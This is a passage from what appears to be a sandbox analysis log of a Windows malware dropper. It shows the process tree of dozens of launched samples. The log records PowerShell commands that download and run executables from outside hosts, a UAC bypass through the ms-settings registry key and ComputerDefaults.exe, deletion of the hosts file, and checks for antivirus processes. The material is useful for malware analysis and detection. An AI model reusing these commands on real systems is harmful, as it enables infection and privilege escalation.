      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 6 -isForBrowser -prefsHandle 4760 -prefMapHandle 5024 -prefsLen 27721 -prefMapSize 244977 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {263eff43-d7e0-4143-b775-ca9e81f611e9} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" tab
      4⤵
      PID:2296
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2616
- - C:\Users\Admin\Desktop\a\random.exe
    "C:\Users\Admin\Desktop\a\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:1680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 1380
      4⤵
      Program crash
      PID:1080
- - C:\Users\Admin\Desktop\a\unik.exe
    "C:\Users\Admin\Desktop\a\unik.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:380
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 1456
      4⤵
      Program crash
      PID:3860
- - C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe
    "C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe"
    3⤵
    - Executes dropped EXE
    PID:1564
- - C:\Users\Admin\Desktop\a\test28.exe
    "C:\Users\Admin\Desktop\a\test28.exe"
    3⤵
    - Executes dropped EXE
    PID:2956
- - C:\Users\Admin\Desktop\a\test26.exe
    "C:\Users\Admin\Desktop\a\test26.exe"
    3⤵
    - Executes dropped EXE
    PID:1160
- - C:\Users\Admin\Desktop\a\test27.exe
    "C:\Users\Admin\Desktop\a\test27.exe"
    3⤵
    - Executes dropped EXE
    PID:644
- - C:\Users\Admin\Desktop\a\test29.exe
    "C:\Users\Admin\Desktop\a\test29.exe"
    3⤵
    - Executes dropped EXE
    PID:2268
- - C:\Users\Admin\Desktop\a\test25.exe
    "C:\Users\Admin\Desktop\a\test25.exe"
    3⤵
    - Executes dropped EXE
    PID:3492
- - C:\Users\Admin\Desktop\a\test24.exe
    "C:\Users\Admin\Desktop\a\test24.exe"
    3⤵
    - Executes dropped EXE
    PID:916
- - C:\Users\Admin\Desktop\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
    "C:\Users\Admin\Desktop\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:1388
  - - C:\Users\Admin\AppData\Local\Temp\ISV5406.tmp\saBSI\saBSI.exe
      "C:\Users\Admin\AppData\Local\Temp\ISV5406.tmp\saBSI\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:3680
    - - C:\Users\Admin\AppData\Local\Temp\ISV5406.tmp\saBSI\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ISV5406.tmp\saBSI\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5008
      - C:\Program Files\McAfee\Temp496036259\installer.exe
        
        "C:\Program Files\McAfee\Temp496036259\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Modifies registry class
        
        PID:2192
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\System32\explorer.exe" /select,"C:\Users\Admin\Downloads\tik-tok-1.0.5.0-installer.exe"
      4⤵
      PID:1300
- - C:\Users\Admin\Desktop\a\main_v4.exe
    "C:\Users\Admin\Desktop\a\main_v4.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2032
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:4888
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      System Location Discovery: System Language Discovery
      PID:3052
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:1000
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4000
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      System Location Discovery: System Language Discovery
      PID:4744
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      Detects videocard installed
      PID:3916
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:1980
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:4648
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1660
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      System Location Discovery: System Language Discovery
      PID:2424
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:2248
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3260
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      System Location Discovery: System Language Discovery
      PID:3244
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:3952
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:568
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:1880
- - C:\Users\Admin\Desktop\a\TikTok18.exe
    "C:\Users\Admin\Desktop\a\TikTok18.exe"
    3⤵
    - Executes dropped EXE
    PID:3016
  - - C:\Users\Admin\AppData\Local\Temp\e6294d8\TikTok18.exe
      run=1 shortcut="C:\Users\Admin\Desktop\a\TikTok18.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c .\TikTok18.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2340
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5428
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe;
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
        
        C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe ;
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"
        8⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 304
        8⤵
        Program crash
        
        PID:5272
- - C:\Users\Admin\Desktop\a\papa_hr_build.exe
    "C:\Users\Admin\Desktop\a\papa_hr_build.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:400
  - - C:\Users\Admin\Desktop\a\papa_hr_build.exe
      "C:\Users\Admin\Desktop\a\papa_hr_build.exe"
      4⤵
      Executes dropped EXE
      PID:5052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 304
      4⤵
      Program crash
      PID:1500
- - C:\Users\Admin\Desktop\a\fHR9z2C.exe
    "C:\Users\Admin\Desktop\a\fHR9z2C.exe"
    3⤵
    - Executes dropped EXE
    PID:3268
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:1656
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:5052
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8140.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:4188
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8140.vbs" /f
        5⤵
        Modifies registry class
        
        PID:1572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:3432
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:4428
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:2408
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\8140.vbs
        6⤵
        
        PID:6064
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:1168
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\8140.vbs
      4⤵
      PID:5544
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:2088
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2192
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:5652
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:3216
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:2388
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8603.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:2100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8603.vbs" /f
        5⤵
        Modifies registry class
        
        PID:6080
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:3676
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:1168
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:5304
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\8603.vbs
        6⤵
        
        PID:5728
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5428
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\8603.vbs
      4⤵
      PID:5644
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:2316
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:1812
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:5792
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3308
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7578.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:3172
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7578.vbs" /f
        5⤵
        Modifies registry class
        
        PID:4300
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:1660
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:3016
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:5912
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\7578.vbs
        6⤵
        
        PID:4960
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3084
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\7578.vbs
      4⤵
      PID:4744
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:2316
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:5512
- - C:\Users\Admin\Desktop\a\AmLzNi.exe
    "C:\Users\Admin\Desktop\a\AmLzNi.exe"
    3⤵
    - Executes dropped EXE
    PID:2816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4428
- - C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe
    "C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"
    3⤵
    - Executes dropped EXE
    PID:5600
- - C:\Users\Admin\Desktop\a\XClient.exe
    "C:\Users\Admin\Desktop\a\XClient.exe"
    3⤵
    - Executes dropped EXE
    PID:5764
- - C:\Users\Admin\Desktop\a\VBVEd6f.exe
    "C:\Users\Admin\Desktop\a\VBVEd6f.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:2836
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd
      4⤵
      System Location Discovery: System Language Discovery
      PID:1684
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:684
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:5512
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6092
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3616
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 397506
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4708
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k
        5⤵
        
        PID:5164
    - - C:\Users\Admin\AppData\Local\Temp\397506\Mesa.com
        
        Mesa.com k
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2488
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:1004
- - C:\Users\Admin\Desktop\a\test12.exe
    "C:\Users\Admin\Desktop\a\test12.exe"
    3⤵
    - Executes dropped EXE
    PID:2088
- - C:\Users\Admin\Desktop\a\test6.exe
    "C:\Users\Admin\Desktop\a\test6.exe"
    3⤵
    - Executes dropped EXE
    PID:5596
- - C:\Users\Admin\Desktop\a\test14.exe
    "C:\Users\Admin\Desktop\a\test14.exe"
    3⤵
    - Executes dropped EXE
    PID:5572
- - C:\Users\Admin\Desktop\a\pantest.exe
    "C:\Users\Admin\Desktop\a\pantest.exe"
    3⤵
    - Executes dropped EXE
    PID:6072
- - C:\Users\Admin\Desktop\a\test9.exe
    "C:\Users\Admin\Desktop\a\test9.exe"
    3⤵
    - Executes dropped EXE
    PID:6096
- - C:\Users\Admin\Desktop\a\test10-29.exe
    "C:\Users\Admin\Desktop\a\test10-29.exe"
    3⤵
    - Executes dropped EXE
    PID:3360
- - C:\Users\Admin\Desktop\a\test19.exe
    "C:\Users\Admin\Desktop\a\test19.exe"
    3⤵
    - Executes dropped EXE
    PID:1700
- - C:\Users\Admin\Desktop\a\test10.exe
    "C:\Users\Admin\Desktop\a\test10.exe"
    3⤵
    - Executes dropped EXE
    PID:4640
- - C:\Users\Admin\Desktop\a\test_again4.exe
    "C:\Users\Admin\Desktop\a\test_again4.exe"
    3⤵
    - Executes dropped EXE
    PID:5328
- - C:\Users\Admin\Desktop\a\test23.exe
    "C:\Users\Admin\Desktop\a\test23.exe"
    3⤵
    - Executes dropped EXE
    PID:5148
- - C:\Users\Admin\Desktop\a\test5.exe
    "C:\Users\Admin\Desktop\a\test5.exe"
    3⤵
    PID:132
- - C:\Users\Admin\Desktop\a\test11.exe
    "C:\Users\Admin\Desktop\a\test11.exe"
    3⤵
    PID:6084
- - C:\Users\Admin\Desktop\a\test20.exe
    "C:\Users\Admin\Desktop\a\test20.exe"
    3⤵
    PID:2792
- - C:\Users\Admin\Desktop\a\test_again3.exe
    "C:\Users\Admin\Desktop\a\test_again3.exe"
    3⤵
    PID:5544
- - C:\Users\Admin\Desktop\a\test16.exe
    "C:\Users\Admin\Desktop\a\test16.exe"
    3⤵
    PID:6168
- - C:\Users\Admin\Desktop\a\test13.exe
    "C:\Users\Admin\Desktop\a\test13.exe"
    3⤵
    PID:6656
- - C:\Users\Admin\Desktop\a\test_again2.exe
    "C:\Users\Admin\Desktop\a\test_again2.exe"
    3⤵
    PID:6952
- - C:\Users\Admin\Desktop\a\test15.exe
    "C:\Users\Admin\Desktop\a\test15.exe"
    3⤵
    PID:6372
- - C:\Users\Admin\Desktop\a\test18.exe
    "C:\Users\Admin\Desktop\a\test18.exe"
    3⤵
    PID:6740
- - C:\Users\Admin\Desktop\a\test21.exe
    "C:\Users\Admin\Desktop\a\test21.exe"
    3⤵
    PID:6588
- - C:\Users\Admin\Desktop\a\test22.exe
    "C:\Users\Admin\Desktop\a\test22.exe"
    3⤵
    PID:6384
- - C:\Users\Admin\Desktop\a\test8.exe
    "C:\Users\Admin\Desktop\a\test8.exe"
    3⤵
    PID:6400
- - C:\Users\Admin\Desktop\a\test7.exe
    "C:\Users\Admin\Desktop\a\test7.exe"
    3⤵
    PID:5184
- - C:\Users\Admin\Desktop\a\test-again.exe
    "C:\Users\Admin\Desktop\a\test-again.exe"
    3⤵
    PID:5192
- - C:\Users\Admin\Desktop\a\test17.exe
    "C:\Users\Admin\Desktop\a\test17.exe"
    3⤵
    PID:6284
- - C:\Users\Admin\Desktop\a\vg9qcBa.exe
    "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
    3⤵
    PID:7136
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6220
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6828
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6644
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6664
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:2780
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6668
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6816
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6604
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6860
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6876
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6752
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6796
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6780
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6804
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6956
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5080
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6872
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5164
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6896
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6968
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5652
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6996
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6864
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7068
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:4912
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6148
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6092
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6412
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7144
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:3016
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6176
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6024
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:404
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6708
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6724
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:2752
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6676
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6756
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6772
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6672
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:1244
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:948
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6272
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6908
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6312
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7028
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7056
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5024
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7064
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7048
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
